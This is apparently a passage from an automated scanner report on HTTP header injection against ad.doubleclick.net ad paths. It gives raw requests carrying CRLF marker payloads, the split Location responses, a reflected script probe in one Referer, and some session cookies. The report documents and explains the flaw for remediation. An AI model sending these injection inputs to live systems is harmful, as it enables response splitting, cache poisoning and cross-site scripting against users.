Cookie: JSESSIONID=742D057A43F797E9E8131B7D50AC79FD.menthuv5web1; PSESSIONID=0a0ef7ad-e10f-484e-8ac0-9d2a7f576a45; overridepartner=ING; source=11E; partner=ING%2527%2527; TXNSESSION=[Session]~^163~^4424~^-=~^T~^1303494336343~^null~^ING~^-=~^10000~^F~^F~^F~^11E~^-=~^; PRODUCTCMPRODCAT=; cmTPSet=Y; CoreID6=01617077583213034943369&ci=90043274; __utmz=258950152.1303494337.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 90043274_clogin=l=1303494336&v=1&e=1303496152997; __utma=258950152.1552621464.1303494337.1303494337.1303494337.1; __utmc=258950152; __utmb=258950152.2.10.1303494337; 90043274_clogin=l=1303494336&v=1&e=1303496223348; cmRS=&t1=1303494352983&t2=1303494355803&t3=1303494423347&t4=1303494352911&lti=1303494423347&ln=Outdoor%20Holiday%20Decor&hr=/shopping/subdept.htm%3Fc%3D102961916%26cm_re%3DInsideOutdoorLiving-_-OutdoorHolidayDecor-_-Image&fti=&fn=search%3A0%3Bjoinemail%3A1%3BselTpPkFrm%3A2%3B&ac=&fd=&uer=&fu=&pi=Dept%3A%20Level%201%3A%20Outdoor%20Living&ho=data.coremetrics.com/cm%3F&ci=90043274&cjen=1

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/1.0.0a mod_jk/1.2.30
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
P3P: policyref=/w3c/p3p.xml
P3P: policyref=/w3c/p3p.xml
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Fri, 22 Apr 2011 18:25:35 GMT
Connection: close
Set-Cookie: JSESSIONID=98349B4139B3A06BCDE2DC9B8F0AAD32.septuv5web; Path=/shopping
Set-Cookie: partner=ING; Expires=Sat, 21-Apr-2012 18:25:33 GMT
Set-Cookie: source=11E; Expires=Sat, 21-Apr-2012 18:25:33 GMT
Set-Cookie: source=11E; Expires=Sat, 21-Apr-2012 18:25:35 GMT
Set-Cookie: partner=ING; Expires=Sat, 21-Apr-2012 18:25:35 GMT
Set-Cookie: TXNSESSION=[Session]~^163~^4424~^-=~^T~^1303496733626~^null~^ING~^-=~^10000~^F~^F~^F~^11E~^-=~^; Expires=Fri, 06-May-2011 18:25:35 GMT
Set-Cookie: PRODUCTCMPRODCAT=; Expires=Fri, 06-May-2011 18:25:35 GMT
Content-Length: 212900


<!--includes code start-->


<!--includes code end-->
<!--header values start-->


<!--header values end-->
...[SNIP]...

2. HTTP header injection  previous  next
There are 35 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


2.1. http://ad.doubleclick.net/ad/x1.aud/salesforce/customcloud/lp [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/x1.aud/salesforce/customcloud/lp

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 783e8%0d%0ac06670d51f2 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /783e8%0d%0ac06670d51f2/x1.aud/salesforce/customcloud/lp;sz=1x1;ord=1303485894655? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.salesforce.com/platform/?e9e1f%22%3E%3Cscript%3Ealert(1)%3C/script%3Eca65c1d65e=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/783e8
c06670d51f2
/x1.aud/salesforce/customcloud/lp;sz=1x1;ord=1303485894655:
Date: Fri, 22 Apr 2011 15:27:18 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.2. http://ad.doubleclick.net/adj/N3493.intergi.com/B5426713.10 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N3493.intergi.com/B5426713.10

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 7a868%0d%0ad0c23c48779 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /7a868%0d%0ad0c23c48779/N3493.intergi.com/B5426713.10;sz=300x250;pc=[TPAS_ID];click=http%3A//ads.intergi.com/adlink%2F5205%2F1785959%2F0%2F170%2FAdId%3D1631923%3BBnId%3D8%3Bitime%3D486158650%3Blink%3D;ord=486158650? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ads.intergi.com/adiframe/3.0/5205/1785959/0/170/ADTECH;target=_blank;kvesrb=e:e10:t:m;kvgender=male:female;kvgenre=simulation:adventure:action:shooter:fitness:strategy:sports;kvsite=ubi;grp=[group]
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/7a868
d0c23c48779
/N3493.intergi.com/B5426713.10;sz=300x250;pc=[TPAS_ID];click=http: //ads.intergi.com/adlink/5205/1785959/0/170/AdId=1631923;BnId=8;itime=486158650;link=;ord=486158650
Date: Fri, 22 Apr 2011 15:43:07 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.3. http://ad.doubleclick.net/adj/N3493.intergi.com/B5426713.9 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N3493.intergi.com/B5426713.9

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 60418%0d%0a34c9f29abd4 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /60418%0d%0a34c9f29abd4/N3493.intergi.com/B5426713.9;sz=728x90;pc=[TPAS_ID];click=http%3A//ads.intergi.com/adlink%2F5205%2F1785960%2F0%2F225%2FAdId%3D1631923%3BBnId%3D7%3Bitime%3D486157331%3Blink%3D;ord=486157331? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ads.intergi.com/adiframe/3.0/5205/1785960/0/225/ADTECH;target=_blank;kvesrb=e:e10:t:m;kvgender=male:female;kvgenre=simulation:adventure:action:shooter:fitness:strategy:sports;kvsite=ubi:;grp=[group]
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/60418
34c9f29abd4
/N3493.intergi.com/B5426713.9;sz=728x90;pc=[TPAS_ID];click=http: //ads.intergi.com/adlink/5205/1785960/0/225/AdId=1631923;BnId=7;itime=486157331;link=;ord=486157331
Date: Fri, 22 Apr 2011 15:43:02 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.4. http://ad.doubleclick.net/adj/wn.loc.kwtv/business [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/wn.loc.kwtv/business

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 24a69%0d%0a95608d91e7f was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /24a69%0d%0a95608d91e7f/wn.loc.kwtv/business;sz=850x30;wnsz=85;tile=1;wncc=Business;wnpt=C;wnpc=category;wncp=KWTV;wncid=148006;wnad85=kwtv;apptype=platform;env=production;ord=40232894? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ad.doubleclick.net
Cookie: id=ce2707d360000b2||t=1303486124|et=730|cs=oc-umh3y

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/24a69
95608d91e7f
/wn.loc.kwtv/business;sz=850x30;wnsz=85;tile=1;wncc=Business;wnpt=C;wnpc=category;wncp=KWTV;wncid=148006;wnad85=kwtv;apptype=platform;env=production;ord=40232894:
Date: Fri, 22 Apr 2011 15:49:48 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.5. http://ad.doubleclick.net/adj/wn.loc.kwtv/education [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/wn.loc.kwtv/education

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 128d5%0d%0a371e27bda97 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /128d5%0d%0a371e27bda97/wn.loc.kwtv/education;sz=850x30;wnsz=85;tile=1;wncc=Education;wnpt=C;wnpc=category;wncp=KWTV;wncid=118249;wnad85=kwtv;apptype=platform;env=production;ord=2486062? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ad.doubleclick.net
Cookie: id=ce2707d360000b2||t=1303486124|et=730|cs=oc-umh3y

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/128d5
371e27bda97
/wn.loc.kwtv/education;sz=850x30;wnsz=85;tile=1;wncc=Education;wnpt=C;wnpc=category;wncp=KWTV;wncid=118249;wnad85=kwtv;apptype=platform;env=production;ord=2486062:
Date: Fri, 22 Apr 2011 15:50:19 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.6. http://ad.doubleclick.net/adj/wn.loc.kwtv/foodrecipe [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/wn.loc.kwtv/foodrecipe

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 85080%0d%0a1c362817312 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /85080%0d%0a1c362817312/wn.loc.kwtv/foodrecipe;sz=850x30;wnsz=85;tile=1;wncc=Food%20Recipe;wnpt=C;wnpc=category;wncp=KWTV;wncid=116604;wnad85=kwtv;apptype=platform;env=production;ord=44488092? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ad.doubleclick.net
Cookie: id=ce2707d360000b2||t=1303486124|et=730|cs=oc-umh3y

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/85080
1c362817312
/wn.loc.kwtv/foodrecipe;sz=850x30;wnsz=85;tile=1;wncc=Food Recipe;wnpt=C;wnpc=category;wncp=KWTV;wncid=116604;wnad85=kwtv;apptype=platform;env=production;ord=44488092:
Date: Fri, 22 Apr 2011 16:02:42 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.7. http://ad.doubleclick.net/adj/wn.loc.kwtv/health [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/wn.loc.kwtv/health

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 4ab25%0d%0adf95d629563 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /4ab25%0d%0adf95d629563/wn.loc.kwtv/health;sz=850x30;wnsz=85;tile=1;wncc=Health;wnpt=C;wnpc=category;wncp=KWTV;wncid=118786;wnad85=kwtv;apptype=platform;env=production;ord=69038566? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ad.doubleclick.net
Cookie: id=ce2707d360000b2||t=1303486124|et=730|cs=oc-umh3y

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/4ab25
df95d629563
/wn.loc.kwtv/health;sz=850x30;wnsz=85;tile=1;wncc=Health;wnpt=C;wnpc=category;wncp=KWTV;wncid=118786;wnad85=kwtv;apptype=platform;env=production;ord=69038566:
Date: Fri, 22 Apr 2011 15:49:24 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.8. http://ad.doubleclick.net/adj/wn.loc.kwtv/homepage [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/wn.loc.kwtv/homepage

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 444c6%0d%0ae6a8292f14b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /444c6%0d%0ae6a8292f14b/wn.loc.kwtv/homepage;sz=850x30;wnsz=85;tile=1;wncc=Homepage;wnpt=C;wnpc=home;wncp=KWTV;wncid=112029;wnad85=kwtv;apptype=platform;env=production;ord=44676079? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ad.doubleclick.net

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/444c6
e6a8292f14b
/wn.loc.kwtv/homepage;sz=850x30;wnsz=85;tile=1;wncc=Homepage;wnpt=C;wnpc=home;wncp=KWTV;wncid=112029;wnad85=kwtv;apptype=platform;env=production;ord=44676079:
Date: Fri, 22 Apr 2011 15:29:59 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.9. http://ad.doubleclick.net/adj/wn.loc.kwtv/news [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/wn.loc.kwtv/news

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 79784%0d%0aad9ab883b2f was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /79784%0d%0aad9ab883b2f/wn.loc.kwtv/news;sz=850x30;wnsz=85;tile=1;wncc=News;wnpt=C;wnpc=category;wncp=KWTV;wncid=112032;wnad85=kwtv;apptype=platform;env=production;ord=5667961? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ad.doubleclick.net
Cookie: id=ce2707d360000b2||t=1303486124|et=730|cs=oc-umh3y

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/79784
ad9ab883b2f
/wn.loc.kwtv/news;sz=850x30;wnsz=85;tile=1;wncc=News;wnpt=C;wnpc=category;wncp=KWTV;wncid=112032;wnad85=kwtv;apptype=platform;env=production;ord=5667961:
Date: Fri, 22 Apr 2011 15:31:57 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.10. http://ad.doubleclick.net/adj/wn.loc.kwtv/radio01 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/wn.loc.kwtv/radio01

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 5c7a0%0d%0ac1c87f28023 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /5c7a0%0d%0ac1c87f28023/wn.loc.kwtv/radio01;sz=850x30;wnsz=85;tile=1;wncc=Radio%2001;wnpt=C;wnpc=category;wncp=KWTV;wncid=167390;wnad85=kwtv;apptype=platform;env=production;ord=49511500? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ad.doubleclick.net
Cookie: test_cookie=CheckForPermission

Response

HTTP/1.1 301 Moved Permanently
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/5c7a0
c1c87f28023
/wn.loc.kwtv/radio01;sz=850x30;wnsz=85;tile=1;wncc=Radio 01;wnpt=C;wnpc=category;wncp=KWTV;wncid=167390;wnad85=kwtv;apptype=platform;env=production;ord=49511500:
Date: Fri, 22 Apr 2011 15:30:46 GMT
Server: GFE/2.0

<h1>Error 301 Moved Permanently</h1>

2.11. http://ad.doubleclick.net/adj/wn.loc.kwtv/radio07 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/wn.loc.kwtv/radio07

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 70979%0d%0a884ebdddc36 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /70979%0d%0a884ebdddc36/wn.loc.kwtv/radio07;sz=850x30;wnsz=85;tile=1;wncc=Radio%2007;wnpt=C;wnpc=category;wncp=KWTV;wncid=192772;wnad85=kwtv;apptype=platform;env=production;ord=66912645? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ad.doubleclick.net
Cookie: test_cookie=CheckForPermission

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/70979
884ebdddc36
/wn.loc.kwtv/radio07;sz=850x30;wnsz=85;tile=1;wncc=Radio 07;wnpt=C;wnpc=category;wncp=KWTV;wncid=192772;wnad85=kwtv;apptype=platform;env=production;ord=66912645:
Date: Fri, 22 Apr 2011 15:30:50 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.12. http://ad.doubleclick.net/adj/wn.loc.kwtv/sales-environmental [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/wn.loc.kwtv/sales-environmental

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 38d1b%0d%0a18fb41cf4bb was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /38d1b%0d%0a18fb41cf4bb/wn.loc.kwtv/sales-environmental;sz=850x30;wnsz=85;tile=1;wncc=Sales%20-%20Environmental;wnpt=S;wnpc=story;wncp=KWTV;wncid=5963519;wnad85=kwtv;apptype=platform;env=production;ord=24937444? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ad.doubleclick.net
Cookie: id=ce2707d360000b2||t=1303486124|et=730|cs=oc-umh3y

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/38d1b
18fb41cf4bb
/wn.loc.kwtv/sales-environmental;sz=850x30;wnsz=85;tile=1;wncc=Sales - Environmental;wnpt=S;wnpc=story;wncp=KWTV;wncid=5963519;wnad85=kwtv;apptype=platform;env=production;ord=24937444:
Date: Fri, 22 Apr 2011 15:58:23 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.13. http://ad.doubleclick.net/adj/wn.loc.kwtv/sales-worldnow22 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/wn.loc.kwtv/sales-worldnow22

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 39061%0d%0a54db89200bd was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /39061%0d%0a54db89200bd/wn.loc.kwtv/sales-worldnow22;sz=850x30;wnsz=85;tile=1;wncc=Sales%20-%20WorldNow%2022;wnpt=C;wnpc=category;wncp=KWTV;wncid=174696;wnad85=kwtv;apptype=platform;env=production;ord=43728747? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ad.doubleclick.net
Cookie: id=ce2707d360000b2||t=1303486124|et=730|cs=oc-umh3y

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/39061
54db89200bd
/wn.loc.kwtv/sales-worldnow22;sz=850x30;wnsz=85;tile=1;wncc=Sales - WorldNow 22;wnpt=C;wnpc=category;wncp=KWTV;wncid=174696;wnad85=kwtv;apptype=platform;env=production;ord=43728747:
Date: Fri, 22 Apr 2011 15:31:58 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.14. http://ad.doubleclick.net/adj/wn.loc.kwtv/station15 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/wn.loc.kwtv/station15

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 42451%0d%0a9e7b66d82f4 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /42451%0d%0a9e7b66d82f4/wn.loc.kwtv/station15;sz=850x30;wnsz=85;tile=1;wncc=Station%2015;wnpt=L;wnpc=linksplus;wncp=KWTV;wncid=288387;wnad85=kwtv;apptype=platform;env=production;ord=95186721? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ad.doubleclick.net
Cookie: id=ce2707d360000b2||t=1303486124|et=730|cs=oc-umh3y

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/42451
9e7b66d82f4
/wn.loc.kwtv/station15;sz=850x30;wnsz=85;tile=1;wncc=Station 15;wnpt=L;wnpc=linksplus;wncp=KWTV;wncid=288387;wnad85=kwtv;apptype=platform;env=production;ord=95186721:
Date: Fri, 22 Apr 2011 16:00:47 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.15. http://ad.doubleclick.net/adj/wn.loc.kwtv/station5 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/wn.loc.kwtv/station5

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 65653%0d%0af322941222e was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /65653%0d%0af322941222e/wn.loc.kwtv/station5;sz=850x30;wnsz=85;tile=1;wncc=Station%205;wnpt=C;wnpc=category;wncp=KWTV;wncid=118270;wnad85=kwtv;apptype=platform;env=production;ord=80149608? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ad.doubleclick.net
Cookie: id=ce2707d360000b2||t=1303486124|et=730|cs=oc-umh3y

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/65653
f322941222e
/wn.loc.kwtv/station5;sz=850x30;wnsz=85;tile=1;wncc=Station 5;wnpt=C;wnpc=category;wncp=KWTV;wncid=118270;wnad85=kwtv;apptype=platform;env=production;ord=80149608:
Date: Fri, 22 Apr 2011 15:33:31 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.16. http://ad.doubleclick.net/adj/wn.loc.kwtv/station9 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/wn.loc.kwtv/station9

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 67945%0d%0ae9c1fd5ec9b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /67945%0d%0ae9c1fd5ec9b/wn.loc.kwtv/station9;sz=850x30;wnsz=85;tile=1;wncc=Station%209;wnpt=S;wnpc=story;wncp=KWTV;wncid=7520733;wnad85=kwtv;apptype=platform;env=production;ord=5657574? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ad.doubleclick.net
Cookie: id=c67717d3600004f||t=1303486122|et=730|cs=dj_eps5o

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/67945
e9c1fd5ec9b
/wn.loc.kwtv/station9;sz=850x30;wnsz=85;tile=1;wncc=Station 9;wnpt=S;wnpc=story;wncp=KWTV;wncid=7520733;wnad85=kwtv;apptype=platform;env=production;ord=5657574:
Date: Fri, 22 Apr 2011 15:30:54 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.17. http://ad.doubleclick.net/adj/wn.nat.kwtv/news [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
